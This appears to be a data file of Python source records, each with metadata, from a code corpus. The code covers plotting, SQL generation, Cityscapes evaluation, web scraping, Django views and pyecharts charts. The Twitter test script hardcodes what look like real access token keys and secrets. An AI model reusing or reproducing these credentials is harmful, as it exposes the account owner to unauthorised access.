pd.DataFrame(new_output[cstart+2:cstart+2+m+1],columns=columns,index=range(0,m))\n \n\n \n self.meta=meta\n self.base=df\n self.fname=fname\n self.columns=columns\n\n\n def to_hdf(self, key='/oscillator_strengths',fname=working_directory):\n if not self.base.empty:\n with pd.HDFStore('{}.h5'.format(fname), 'a') as f:\n f.put(key, self.base)\n f.get_storer(key).attrs.metadata = self.meta\n\n\n", "sub_path": "carsus/io/cmfgen/oscfiles.py", "file_name": "oscfiles.py", "file_ext": "py", "file_size_in_byte": 6687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.head", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 37, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 51, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 90, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.HDFStore", "line_number": 117, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 221, "usage_type": "call"}, {"api_name": "pandas.HDFStore", "line_number": 233, "usage_type": "call"}]} +{"seq_id": "8832747", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\ndef plot_persistence(data,params):\n \n \"\"\"Arguments in are (0) a dictionary and (1) parameters\"\"\"\n \n # Extract parameters\n dim = params['dim']\n 
thr = params['max_persistence']\n \n # Plot figure\n fig = plt.figure(figsize = (8,8))\n ax = fig.add_subplot(1,1,1)\n ax.plot([0,thr],[0,thr],'k')\n for d in range(dim+1):\n data_array = np.array(data[d])\n ax.plot(data_array[:,0],data_array[:,1],'x',label='dim = '+str(d),clip_on=False)\n data_array = []\n ax.set_xlabel('birth')\n ax.set_ylabel('death')\n ax.axis([0,thr,0,thr])\n ax.legend(numpoints=1,loc=4)\n \n # Create title with parameter info\n title = params.copy()\n del title['dim']\n del title['max_persistence']\n string = 'persistence diagram with the following parameters:\\n'\n j = 1\n k = 1\n for i in sorted(title):\n string += str(i) + ' = ' + str(title[i])\n if k < len(title):\n string += ','\n if j > 3:\n j = 1\n string += '\\n'\n else:\n j += 1\n string += ' '\n k += 1\n ax.set_title(string)\n \n return fig\n ", "sub_path": "scripts/PlotPersistence.py", "file_name": "PlotPersistence.py", "file_ext": "py", "file_size_in_byte": 1216, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "126398391", "text": "from Leitor_de_Arquivos_CSV import *\nfrom datetime import *\nimport os\n\ndef criar_banco_de_dados_projeto_para_indicium_e_utilizalo():\n caminho = 'C:/Users/Usuario/Desktop/Organização da Area de Trabalho Zero ILumi' \\\n '/Teste pratico indicium/code-challenge/data/Tabelas' \\\n '/Comando_para_criar_e_usar_banco_de_dados_Projeto_Indicium.sql'\n arquivo = open(caminho, 'w')\n arquivo.write('CREATE DATABASE Projeto_Indicium\\n'\n 'USE Projeto_Indicium')\n\n\n\n\ndef criar_comandos_de_criacao_da_tabela_order_details():\n caminho = 'C:/Users/Usuario/Desktop/Nova pasta/Tabela_order_details.sql'\n arquivo = open(caminho, 'w')\n arquivo.write('CREATE TABLE order_details\\n'\n '(\\n'\n '{Campos}\\n'\n ')\\n'\n ''.format(Campos=ler_campos_do_arquivo_csv_para_CREATE_TABLE()))\n\n\ndef criar_registos_da_tabela_order_details():\n caminho = 'C:/Users/Usuario/Desktop/Nova pasta/Registros_da_tabela_order_details.sql'\n arquivo = open(caminho, 'w')\n arquivo.write('{ler_registros_da_tabela_order_details} SELECT * FROM order_details'\n ''.format(ler_registros_da_tabela_order_details=ler_registros_da_tabela_order_details()))\n\n\n# Through the variable hoje, this function\n# stores the current date, which is returned\n# by the datetime function datetime.now();\n# it then returns the current date formatted\n# as a time string with day-month-full_year,\n# e.g. 10-09-2021\ndef imprimir_dia_atual():\n hoje = datetime.now()\n return hoje.strftime('%d-%m-%Y')\n\n\ndef criar_pasta_e_arquivo_com_a_data_atual_para_order_detais():\n diretorio = imprimir_dia_atual()\n diretorio_caminho = 'C:/Users/Usuario/Desktop/Organização da Area de Trabalho Zero ILumi/' \\\n 'Teste pratico indicium/code-challenge/data/' \\\n 'Tabela_order_details/{diretorio}'.format(diretorio=diretorio)\n caminho = os.path.join(diretorio, diretorio_caminho)\n modo = 0o166\n try:\n os.mkdir(caminho, modo)\n except OSError:\n print('Não foi possivel criar a Pasta {nome_da_pasta}'\n ' possivelmente ela ja existe.'.format(nome_da_pasta=diretorio))\n else:\n print('Pasta {nome_da_pasta} criada com sucesso'.format(nome_da_pasta=diretorio))\n caminho_do_arquivo = 'C:/Users/Usuario/Desktop/Organização da Area de Trabalho Zero ILumi' \\\n
'/Teste pratico indicium/code-challenge/data/' \\\n 'Tabela_order_details/{diretorio}' \\\n '/order_detais.txt'.format(diretorio=diretorio)\n arquivo = open(caminho_do_arquivo, 'w')\n arquivo.write(\"aaaa\")\n\n\nif __name__ == '__main__':\n # criar_comandos_de_criacao_da_tabela_order_details()\n # criar_registos_da_tabela_order_details()\n # criar_pasta_e_arquivo_com_a_data_atual_para_order_detais()\n criar_banco_de_dados_projeto_para_indicium_e_utilizalo()\n", "sub_path": "code-challenge/projeto_para_indicium/Criador_de_Arquivos_sql.py", "file_name": "Criador_de_Arquivos_sql.py", "file_ext": "py", "file_size_in_byte": 2968, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "653691380", "text": "from sacred import Experiment\nfrom sacred.utils import apply_backspaces_and_linefeeds\nfrom .common import get_observer, experiment_context, clear_directory, load_data\nimport os\nimport sys\nimport logging\nfrom zipfile import ZipFile\nimport tensorflow as tf\nimport bdlb\nfrom tqdm import tqdm\nimport tensorflow_datasets as tfds\n\nfrom .utils import ExperimentData\nfrom fs.data.utils import load_gdrive_file\nfrom fs.data.augmentation import crop_multiple\n\nex = Experiment()\nex.capture_out_filter = apply_backspaces_and_linefeeds\nex.observers.append(get_observer())\n\n@ex.command\ndef saved_model(testing_dataset, model_id, _run, _log, batching=True):\n # testing_dataset is not used, but useful to keep config file consistent with other\n # tests\n data = tfds.load(name='cityscapes', split='validation',\n data_dir='/cluster/work/riner/users/blumh/tensorflow_datasets')\n label_lookup = tf.constant(\n [-1, -1, -1, -1, -1, -1, -1, 0, 1, -1, -1, 2, 3, 4, -1, -1, -1, 5, -1, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15, -1, -1, 16, 17, 18])\n def label_lookup_map(batch):\n batch['segmentation_label'] = tf.gather_nd(\n label_lookup,\n tf.cast(batch['segmentation_label'], tf.int32))\n return batch\n data = data.map(label_lookup_map)\n if batching:\n data = data.batch(1)\n\n ZipFile(load_gdrive_file(model_id, 'zip')).extractall('/tmp/extracted_module')\n tf.compat.v1.enable_resource_variables()\n net = tf.saved_model.load('/tmp/extracted_module')\n\n m = tf.keras.metrics.MeanIoU(num_classes=19)\n for batch in tqdm(data, ascii=True):\n pred = net.signatures['serving_default'](tf.cast(batch['image_left'], tf.float32))\n labels = tf.reshape(batch['segmentation_label'], [-1])\n weights = tf.where(labels == -1, 0, 1)\n labels = tf.where(labels == -1, 0, labels)\n m.update_state(labels,\n tf.reshape(pred['prediction'], [-1]),\n sample_weight=weights)\n\n _run.info['mIoU'] = m.result().numpy()\n\n\nif __name__ == '__main__':\n ex.run_commandline()\n os._exit(os.EX_OK)\n", "sub_path": "experiments/cityscapes_mIoU.py", "file_name": "cityscapes_mIoU.py", "file_ext": "py", "file_size_in_byte": 2127, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sacred.Experiment", "line_number": 17, "usage_type": "call"}, {"api_name": "sacred.utils.apply_backspaces_and_linefeeds", "line_number": 18, "usage_type": "name"}, {"api_name": "common.get_observer", "line_number": 19, "usage_type": "call"}, {"api_name": 
"tensorflow_datasets.load", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 33, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 39, "usage_type": "call"}, {"api_name": "fs.data.utils.load_gdrive_file", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.enable_resource_variables", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.saved_model.load", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.saved_model", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.MeanIoU", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 50, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 58, "usage_type": "call"}, {"api_name": "os.EX_OK", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "583727020", "text": "import twitter\n\nfrom main_config import Config\n\napi = twitter.Api(consumer_key=Config.API_key,\n consumer_secret=Config.API_secret_key,\n access_token_key='1110445913791713280-2UYoQtPqZ5FhBX4fQfGHclShDtm64W',\n access_token_secret='M9g1nOtTyqLQ5qA72AFwwjsv6tqHfyoHTJM2ujaw5PjNj',\n tweet_mode='extended')\nstatuses = api.GetHomeTimeline(exclude_replies=True)\nprint(statuses)\n", "sub_path": "twitter_api/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 438, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "twitter.Api", "line_number": 5, "usage_type": "call"}, {"api_name": "main_config.Config.API_key", "line_number": 5, "usage_type": "attribute"}, {"api_name": "main_config.Config", "line_number": 5, "usage_type": "name"}, {"api_name": "main_config.Config.API_secret_key", "line_number": 6, "usage_type": "attribute"}, {"api_name": "main_config.Config", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "637072153", "text": "# -*- coding: utf-8 -*-\n# Вашей программе на вход подается ссылка на HTML файл.\n# Вам необходимо скачать этот файл, затем найти в нем все ссылки вида и вывести список сайтов, на которые есть ссылка.\n\n# Сайтом в данной задаче будем называть имя домена вместе с именами поддоменов. 
То есть, это последовательность символов, которая следует сразу после символов протокола, если он есть, до символов порта или пути, если они есть.\n\n# Сайты следует выводить в алфавитном порядке.\n\n# Пример HTML файла:\n\n# \n# \n# \n# \n# \n# \n\n# Пример ответа:\n\n# mail.ru\n# neerc.ifmo.ru\n# stepic.org\n# www.ya.ru\n# ya.ru\n\nimport requests\nimport re\n# url = input()\nurl = \"http://ya.ru\"\n\nres = requests.get(url)\n# print(res.status_code)\n# print(res.headers['Content-Type'])\n# print(res.url)\nhtml = res.text\n# links = re.findall('\"((http|ftp)s?://.*?)\"', html)\n# print(links)\n\nregexp_link = r'''s]+))?)+s*|s*)/?>w+'''\npattern = re.compile(regexp_link)\nlinks = re.findall(pattern, html)\n\n#print all matches\nprint(links)\n\n# link_list = re.findall(r\"(?<=href=\\\").+?(?=\\\")|(?<=href=\\').+?(?=\\')\", html)\n# link_list = re.findall(r'href=[\\'\"]?([^\\'\" >]+)', html)\n# # for url in link_list:\n# print(link_list)\n\n\n# linkregex = re.compile('')\n# links = linkregex.findall(html)\n# # links = re.findall(r\"(.*?)\", html)\n# print(links)\n# for link in links:\n # print('href: %s, HTML text: %s' % (link[0], link[1]))", "sub_path": "stepic_py_basic_use/w3/3-3-7.py", "file_name": "3-3-7.py", "file_ext": "py", "file_size_in_byte": 2046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "490654361", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views.generic import View, TemplateView\n\nfrom webapp.models import Tracker, Type, Status\nfrom webapp.forms import TrackerForm, TypeForm, StatusForm\n\nclass IndexView(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['trackers'] = Tracker.objects.all()\n return context\n\nclass TaskTrackerView(TemplateView):\n template_name = 'TaskTrack.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n task_track_pk = self.kwargs.get('pk')\n context['tracker'] = get_object_or_404(Tracker, pk=task_track_pk)\n return context\n\n\nclass TaskTrackerCraeteView(View):\n def get(self, request, *args, **kwargs):\n form = TrackerForm()\n context = {\n 'form': form\n }\n return render(request, 'create.html', context)\n\n def post(self, request, *args, **kwargs):\n form = TrackerForm(data=request.POST)\n if form.is_valid():\n Tracker.objects.create(\n summary=form.cleaned_data['summary'],\n description=form.cleaned_data['description'],\n status=form.cleaned_data['status'],\n type=form.cleaned_data['type']\n )\n return redirect('index')\n else:\n return render(request, 'create.html', context={'form': form})\n\n\nclass TaskTrackerUpdateView(View):\n def get(self, request, *args, **kwargs):\n task_tracker = self.get_odject(self.kwargs.get('pk'))\n form = TrackerForm(data = {\n 'summary':task_tracker.summary,\n 'description':task_tracker.description,\n 'status':task_tracker.status,\n 'type':task_tracker.type\n })\n context = {\n 'task_tracker': task_tracker,\n 'form': form\n }\n return render(request, 'update.html', context)\n\n def post(self, request, *args, **kwargs):\n task_tracker = self.get_odject(self.kwargs.get('pk'))\n form = TrackerForm(data=request.POST)\n if form.is_valid():\n 
task_tracker.summary = request.POST.get('summary')\n task_tracker.description = request.POST.get('description')\n task_tracker.status = request.POST.get('status')\n task_tracker.type = request.POST.get('type')\n task_tracker.save()\n return redirect('index')\n else:\n return render(request, 'update.html', context={'task_tracker': task_tracker, 'form': form})\n\n def get_object(self, pk):\n task_tracker = get_object_or_404(Tracker, pk = pk)\n return task_tracker\n\n\nclass TaskTrackerDeleteView(View):\n def get(self, request, *args, **kwargs):\n task_tracker = self.get_object(self.kwargs.get('pk'))\n context = {'task_tracker': task_tracker}\n return render(request, 'delete.html', context)\n\n def post(self, request, *args, **kwargs):\n task_tracker = self.get_object(self.kwargs.get('pk'))\n task_tracker.delete()\n return redirect('index')\n\n def get_object(self, pk):\n task_tracker = get_object_or_404(Tracker, pk = pk)\n return task_tracker\n\ndef types_list(request, *args, **kwargs):\n types = Type.objects.all()\n return render(request, 'types_ls.html', context={'types': types})\n\ndef status_list(request, *args, **kwargs):\n statuses = Status.objects.all()\n return render(request, 'status_ls.html', context={'statuses': statuses})\n\ndef types_create_view(request, *args, **kwargs):\n if request.method == 'GET':\n form = TypeForm()\n return render(request, 'create_type.html', context={'form': form})\n elif request.method == 'POST':\n form = TypeForm(data=request.POST)\n if form.is_valid():\n Type.objects.create(type=form.cleaned_data['type'])\n return redirect('type_ls')\n else:\n return render(request, 'create_type.html', context={'form': form})\n\ndef statuses_create_view(request, *args, **kwargs):\n if request.method == 'GET':\n form = StatusForm()\n return render(request, 'create_status.html', context={'form': form})\n elif request.method == 'POST':\n form = StatusForm(data=request.POST)\n if form.is_valid():\n Status.objects.create(status=form.cleaned_data['status'])\n return redirect('status_ls')\n else:\n return render(request, 'create_status.html', context={'form': form})\n\n\ndef types_edit_view(request, pk):\n type = get_object_or_404(Type, pk=pk)\n if request.method == 'GET':\n form = TypeForm(data={'type' : type.type})\n return render(request, 'update_type.html', context={'form': form, 'type': type})\n elif request.method == 'POST':\n form = TypeForm(data=request.POST)\n if form.is_valid():\n type.type = request.POST.get('type')\n type.save()\n return redirect('type_ls')\n else:\n return render(request, 'update_type.html', context={'type': type, 'form': form})\n return redirect('type_ls')\n\n\ndef statuses_edit_view(request, pk):\n statuses = get_object_or_404(Status, pk=pk)\n if request.method == 'GET':\n form = StatusForm(data={'status' : statuses.status})\n return render(request, 'update_status.html', context={'form': form, 'status': statuses})\n elif request.method == 'POST':\n form = StatusForm(data=request.POST)\n if form.is_valid():\n statuses.status = request.POST.get('status')\n statuses.save()\n return redirect('status_ls')\n else:\n return render(request, 'update_status.html', context={'status': statuses, 'form': form})\n return redirect('status_ls')\n\n\ndef type_delete_view(request, pk):\n type = get_object_or_404(Type, pk=pk)\n if request.method == 'GET':\n return render(request, 'delete_type.html', context={'type': type})\n elif request.method == 'POST':\n type.delete()\n return redirect('type_ls')\n\n\ndef statuses_delete_view(request, pk):\n statuses =
get_object_or_404(Status, pk=pk)\n if request.method == 'GET':\n return render(request, 'delete_status.html', context={'status': statuses})\n elif request.method == 'POST':\n statuses.delete()\n return redirect('status_ls')\n", "sub_path": "source/webapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "webapp.models.Tracker.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "webapp.models.Tracker.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "webapp.models.Tracker", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "webapp.models.Tracker", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.views.generic.View", "line_number": 25, "usage_type": "name"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 34, "usage_type": "call"}, {"api_name": "webapp.models.Tracker.objects.create", "line_number": 36, "usage_type": "call"}, {"api_name": "webapp.models.Tracker.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "webapp.models.Tracker", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 47, "usage_type": "name"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 76, "usage_type": "call"}, {"api_name": "webapp.models.Tracker", "line_number": 76, "usage_type": "argument"}, {"api_name": "django.views.generic.View", "line_number": 80, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 92, "usage_type": "call"}, {"api_name": "webapp.models.Tracker", "line_number": 92, "usage_type": "argument"}, {"api_name": "webapp.models.Type.objects.all", "line_number": 96, "usage_type": "call"}, {"api_name": "webapp.models.Type.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "webapp.models.Type", "line_number": 96, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 97, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects.all", "line_number": 100, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "webapp.models.Status", "line_number": 100, "usage_type": "name"}, {"api_name": 
"django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "webapp.forms.TypeForm", "line_number": 105, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 106, "usage_type": "call"}, {"api_name": "webapp.forms.TypeForm", "line_number": 108, "usage_type": "call"}, {"api_name": "webapp.models.Type.objects.create", "line_number": 110, "usage_type": "call"}, {"api_name": "webapp.models.Type.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "webapp.models.Type", "line_number": 110, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 113, "usage_type": "call"}, {"api_name": "webapp.forms.StatusForm", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 118, "usage_type": "call"}, {"api_name": "webapp.forms.StatusForm", "line_number": 120, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects.create", "line_number": 122, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "webapp.models.Status", "line_number": 122, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 123, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 129, "usage_type": "call"}, {"api_name": "webapp.models.Type", "line_number": 129, "usage_type": "argument"}, {"api_name": "webapp.forms.TypeForm", "line_number": 131, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 132, "usage_type": "call"}, {"api_name": "webapp.forms.TypeForm", "line_number": 134, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 138, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 145, "usage_type": "call"}, {"api_name": "webapp.models.Status", "line_number": 145, "usage_type": "argument"}, {"api_name": "webapp.forms.StatusForm", "line_number": 147, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}, {"api_name": "webapp.forms.StatusForm", "line_number": 150, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 156, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 157, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 161, "usage_type": "call"}, {"api_name": "webapp.models.Type", "line_number": 161, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 163, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 170, "usage_type": "call"}, {"api_name": "webapp.models.Status", "line_number": 170, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 172, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "242512788", "text": "from django.shortcuts import render\nfrom 
pyecharts import Bar, Pie, Line, Scatter, Boxplot, Radar, WordCloud\nimport numpy as np\nimport pandas as pd\n\nREMOTE_HOST = \"https://pyecharts.github.io/assets/js\"\n\n\ndef index(request):\n return render(request, 'mysite/index.html')\n\n\ndef food_page_first(request):\n food = pd.read_csv('../data/food.csv')\n type_info = food.groupby('type').name.count().sort_values(ascending=False)\n type = [i for i in type_info.index]\n type_count = [i for i in type_info.values]\n type_bar = Bar('各菜系商家数量', width='1000px', title_pos='center', title_top='bottom')\n type_bar.add('数量', type, type_count, is_label_show=True, bar_category_gap='30%', xaxis_rotate=50)\n zone_info = food.groupby('zone').name.count().sort_values(ascending=False).head(15)\n zone = [i for i in zone_info.index]\n zone_count = [i for i in zone_info.values]\n zone_bar = Bar('各商区商家数量', title_pos='center', title_top='bottom')\n zone_bar.add('数量', zone, zone_count, is_label_show=True, xaxis_rotate=30)\n star_list = ['二星商户', '三星商户', '准四星商户', '四星商户', '准五星商户', '五星商户']\n star_data = food[food.star.isin(['二星商户', '三星商户', '准四星商户', '四星商户', '准五星商户', '五星商户'])]\n star_data['star'] = star_data['star'].astype('category')\n star_data['star'].cat.set_categories(star_list, inplace=True)\n star_data.sort_values('star', inplace=True)\n star_info = star_data.groupby('star').name.count()\n star = [i for i in star_info.index]\n star_count = [i for i in star_info.values]\n star_pie = Pie('商家星级比例', title_pos='center', title_top='bottom')\n star_pie.add('数量', star, star_count, is_label_show=True)\n context = dict(\n echart1=type_bar.render_embed(),\n echart2=zone_bar.render_embed(),\n echart3=star_pie.render_embed(),\n host=REMOTE_HOST,\n script_list=type_bar.get_js_dependencies()\n )\n return render(request, 'mysite/food1.html', context)\n\n\ndef food_page_second(request):\n food = pd.read_csv('../data/food.csv')\n price_data = food.dropna(subset=['price'])\n for i, price in enumerate(price_data.price.values):\n price_data.price.values[i] = price.strip('¥')\n price_data[['price']] = price_data[['price']].astype(int)\n price_data = price_data[price_data.price < 2000]\n price_data.rename(columns={'recommend.0': 'recommend0', 'recommend.1': 'recommend1', 'recommend.2': 'recommend2'},\n inplace=True)\n price = [i for i in price_data.price]\n price_data_high = price_data.sort_values(by='price', ascending=False).head(5)\n highs = [row for index, row in price_data_high.iterrows()]\n price_data_high_name = [i for i in price_data_high.name]\n price_data_high_price = [i for i in price_data_high.price]\n price_data_high_bar = Bar(\"人均消费水平最高的五家店铺\", width='600px', title_pos='center', title_top='bottom')\n price_data_high_bar.add('', price_data_high_name, price_data_high_price, xaxis_rotate=10, bar_category_gap='30%',\n yaxis_name='元', yaxis_name_pos='end')\n price_data_low = price_data.sort_values(by='price').head(5)\n lows = [row for index, row in price_data_low.iterrows()]\n price_data_low_name = [i for i in price_data_low.name]\n price_data_low_price = [i for i in price_data_low.price]\n price_data_low_bar = Bar(\"人均消费水平最低的五家店铺\", width='600px', title_pos='center', title_top='bottom')\n price_data_low_bar.add('', price_data_low_name, price_data_low_price, xaxis_rotate=10, bar_category_gap='30%',\n yaxis_name='元', yaxis_name_pos='end')\n price_data_sub = price_data[price_data.price < 500]\n price_info = price_data_sub.groupby('price').name.count()\n price_sub = [i for i in price_info.index]\n price_count = [i for i in price_info.values]\n price_limit = [i for i in 
price_info.index]\n price_scatter = Scatter(\"人均消费(<=500元)\", title_pos='center', title_top='bottom')\n price_scatter.add('', price_sub, price_count, extra_data=price_limit, is_visualmap=True, xaxis_name='人均/元',\n xaxis_name_pos='end', yaxis_name='店铺数量/家', yaxis_name_pos='end', visual_range=[0, 500])\n boxplot = Boxplot('人均消费箱型图', width='400px', title_pos='center', title_top='bottom')\n x_axis = ['']\n boxplot.add('', x_axis, boxplot.prepare_data([price]), yaxis_name='元', yaxis_name_pos='end')\n price_range = list(range(0, 201, 20))\n price_range.append(13000)\n price_data['range'] = pd.cut(price_data.price, price_range, right=True)\n price_data_range = price_data.groupby('range').name.count()\n x_range = ['(0, 20]', '(20, 40]', '(40, 60]', '(60, 80]', '(80, 100]', '(100, 120]',\n '(120, 140]', '(140, 160]', '(160, 180]', '(180, 200]', '>200']\n range_count = [i for i in price_data_range.values]\n line = Line(\"分区间人均消费水平\", width='600px', title_pos='center', title_top='bottom')\n line.add('', x_range, range_count, xaxis_rotate=30)\n context = dict(\n echart1=price_scatter.render_embed(),\n echart2=boxplot.render_embed(),\n echart3=line.render_embed(),\n echart4=price_data_high_bar.render_embed(),\n echart5=price_data_low_bar.render_embed(),\n highs=highs,\n lows=lows,\n price_data_high=price_data_high,\n price_data_high_name=price_data_high_name,\n price_data_high_price=price_data_high_price,\n host=REMOTE_HOST,\n script_list=price_scatter.get_js_dependencies()\n )\n return render(request, 'mysite/food2.html', context)\n\n\ndef food_page_third(request):\n food = pd.read_csv('../data/food.csv')\n comment_data = food.dropna(subset=['comment'])\n comment_data_most = comment_data.sort_values(by='comment', ascending=False).head(5)\n popular_shop = [row for index, row in comment_data_most.iterrows()]\n comment = [i for i in comment_data_most.comment]\n name = [i for i in comment_data_most.name]\n comment_bar = Bar(\"'网红'店铺\", width='600px', title_pos='center', title_top='bottom')\n comment_bar.add('', name, comment, xaxis_rotate=15, is_label_show=True)\n comment_data['name'] = comment_data['name'].map(lambda x: x.split('(')[0])\n shop = comment_data.groupby('name').name.count().sort_values(ascending=False).head(15)\n shop_name = [i for i in shop.index]\n shop_count = [i for i in shop.values]\n shop_bar = Bar(\"分店最多的店铺\", title_pos='center', title_top='bottom')\n shop_bar.add('', shop_name, shop_count, 